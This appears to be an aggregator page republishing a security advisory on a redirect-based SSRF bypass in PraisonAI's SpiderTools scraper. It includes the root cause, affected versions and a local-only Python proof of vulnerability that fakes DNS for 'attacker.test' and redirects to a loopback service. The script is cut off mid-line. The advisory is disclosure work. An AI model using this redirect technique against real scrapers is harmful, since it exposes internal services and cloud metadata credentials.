Technologyglobal✓ verified · 90%

PraisonAI: SpiderTools redirect-target SSRF protection bypass

Name: PraisonAI: SpiderTools redirect-target SSRF protection bypass
Start: 2026-06-18T13:55:14Z
Location: Global (internet)

When: 2026-06-18 13:55 UTC
Where: Global (internet)
Category: cyber_advisory · pip

# SpiderTools redirect-target SSRF protection bypass ## Summary `SpiderTools.scrape_page()` validates the initial URL and rejects direct loopback, private, link-local, metadata, and internal hostnames. It then calls `requests.Session.get()` without disabling automatic redirects or validating redirect `Location` targets. Requests follows redirects by default for GET requests. A safe-looking public URL can therefore pass `_validate_url()`, redirect to a blocked target such as `127.0.0.1` or `169.254.169.254`, and have the redirected response body parsed and returned by `scrape_page()`. The same sink is used by `extract_links()`, `crawl()`, and `extract_text()` through their calls to `scrape_page()`. ## Affected component ```text src/praisonai-agents/praisonaiagents/tools/spider_tools.py ``` Tested affected: - `v3.9.24` / `d08d98ca` - `v3.9.26` / `62472a23` - `v4.6.56` / `d3c4a2af` - `v4.6.57` / `e90d92231853161ad931f3498da57651a9f8b528` - current main `2f9677abb2ea68eab864ee8b6a828fd0141612e1` No patched version is known at report time. ## Root cause Current main validates only the caller-supplied URL: ```python if not self._validate_url(url): return {"error": f"Invalid or potentially dangerous URL: {url}"} ``` The fetch then uses Requests defaults: ```python response = session.get( url, timeout=timeout, verify=verify_ssl ) ``` Because `allow_redirects=False` is not set, Requests follows a 3xx redirect to a new destination that has not been checked by `_validate_url()` or `_host_is_blocked()`. ## Proof of vulnerability The PoV below is local-only and does not contact external infrastructure. It starts a loopback-only internal service and a local redirector. During PraisonAI's initial host validation, `attacker.test` is made to look like a public address. During the actual HTTP request, it routes to the local redirector, which returns `302 Location: http://127.0.0.1:<port>/secret`. Full PoV: ```python #!/usr/bin/env python3 """Local PoV for SpiderTools redirect-target SSRF. This uses only loopback services. The "attacker" hostname is treated as public during PraisonAI's initial URL validation, then routed to a local redirector so the PoV does not contact external infrastructure. The redirector points at a loopback-only internal service. Vulnerable behavior is confirmed when SpiderTools follows that redirect and returns the internal response body. """ from __future__ import annotations import http.server import importlib.util import inspect import os import socket import socketserver import threading from typing import Any def _load_spider_tools_class(): module_file = os.environ.get("PRAISONAI_SPIDER_TOOLS_FILE") if module_file: spec = importlib.util.spec_from_file_location("pov_spider_tools", module_file) if spec is None or spec.loader is None: raise RuntimeError(f"Could not load spider_tools file: {module_file}") module = importlib.util.module_from_spec(spec) spec.loader.exec_module(module) return module.SpiderTools from praisonaiagents.tools.spider_tools import SpiderTools return SpiderTools class InternalHandler(http.server.BaseHTTPRequestHandler): body = b"SPIDER-INTERNAL-SECRET" def do_GET(self) -> None: # noqa: N802 self.server.hit = True # type: ignore[attr-defined] self.send_response(200) self.send_header("Content-Type", "text/html") self.send_header("Content-Length", str(len(self.body))) self.end_headers() self.wfile.write(self.body) def log_message(self, *_args: Any) -> None: return class RedirectHandler(http.server.BaseHTTPRequestHandler): target = "" def do_GET(self) -> None: # noqa: N802 self.server.hit = True # type: ignore[attr-defined] self.send_response(302) self.send_header("Location", self.target) self.end_headers() def log_message(self, *_args: Any) -> None: return def _called_from_spider_host_guard() -> bool: return any(frame.function == "_host_is_blocked" for frame in inspect.stack()) def main() -> int: os.environ.pop("ALLOW_LOCAL_CRAWL", None) internal = socketserver.TCPServer(("127.0.0.1", 0), InternalHandler) internal.hit = False # type: ignore[attr-defined] internal_port = internal.server_address[1] RedirectHandler.target = f"http://127.0.0.1:{internal_port}/secret" redirect = socketserver.TCPServer(("127.0.0.1", 0), RedirectHandler) redirect.hit = False # type: ignore[attr-defined] redirect_port = redirect.server_address[1] threading.Thread(target=internal.serve_forever, daemon=True).start() threading.Thread(target=redirect.serve_forever, daemon=True).start() original_getaddrinfo = socket.getaddrinfo def fake_getaddrinfo(host: str, port: int, *args: Any, **kwargs: Any): if host == "attacker.test": if _called_from_spider_host_guard(): return [ ( socket.AF_INET, socket.SOCK_STREAM, 6, "", ("93.184.216.34", port), ) ] return original_getaddrinfo("127.0.0.1", port, *args, **kwargs) return original_getaddrinfo(host, port, *args, **kwargs) tool = _load_spider_tools_class()() socket.getaddrinfo = fake_getaddrinfo try: direct_control = tool.scrape_page( f"http://127.0.0.1:{internal_port}/secret", timeout=5, ) redirect_result = tool.scrape_page( f"http://attacker.test:{redirect_port}/go", timeout=5, ) vulnerable_redirect_hit = bool(redirect.hit) # type: ignore[attr-defined] vulnerable_internal_hit = bool(internal.hit) # type: ignore[attr-defined] redirect.hit = False # type: ignore[attr-defined] internal.hit = False # type: ignore[attr-defined] import requests original_session_get = requests.Session.get def no_redirect_get(self, url, **kwargs): # type: ignore[no-untyped-def] kwargs.setdefault("allow_redirects", False) return original_session_get(self, url, **kwargs) requests.Session.get = no_redirect_get try: no_redirect_control = _load_spider_tools_class()().scrape_page( f"http://attacker.test:{redirect_port}/go", timeout=5, ) finally: requests.Session.get = original_session_get no_redirect_redirect_hit = bool(redirect.hit) # type: ignore[attr-defined] no_redirect_internal_hit = bool(internal.hit) # type: ignore[attr-defined] finally: socket.getaddrinfo = original_getaddrinfo redirect.shutdown() internal.shutdown() redirect.server_close() internal.server_close() print("DIRECT_CONTROL:", direct_control) print("REDIRECT_RESULT:", redirect_result) print("REDIRECT_SERVER_HIT:", vulnerable_redirect_hit) print("INTERNAL_SERVER_HIT:", vulnerable_internal_hit) print("NO_REDIRECT_CONTROL:", no_redirect_control) print("NO_REDIRECT_SERVER_HIT:", no_redirect_redirect_hit) print("NO_REDIRECT_INTERNAL_HIT:", no_redirect_internal_hit) if not isinstance(direct_control, dict) or "dangerous URL" not in str(direct_control): raise SystemExit("control failed: direct loopback was not blocked") if not isinstance(redirect_result, dict) or "error" in redirect_result: raise SystemExit(f"bypass failed: unexpected result {redirect_result!r}") if "SPIDER-INTERNAL-SECRET" not in str(redirect_result.get("content", "")): raise SystemExit("bypass failed: internal body was not returned") if not vulnerable_redirect_hit or not vulnerable_internal_hit: raise SystemExit("bypass failed: expected local servers were not hit") if not no

Sources

GitHub Advisory Database ↗ · first seen 2026-06-18 13:55 UTC

Defaxon links out to the original reporting and never republishes article text.

Correlated events

Computed by the Defaxon correlation engine — linked by shared actors, co-location, and temporal proximity. Scored hypotheses, never causal claims.

No correlated events found in the current window. As more events arrive, connections form automatically.

← Back to the live map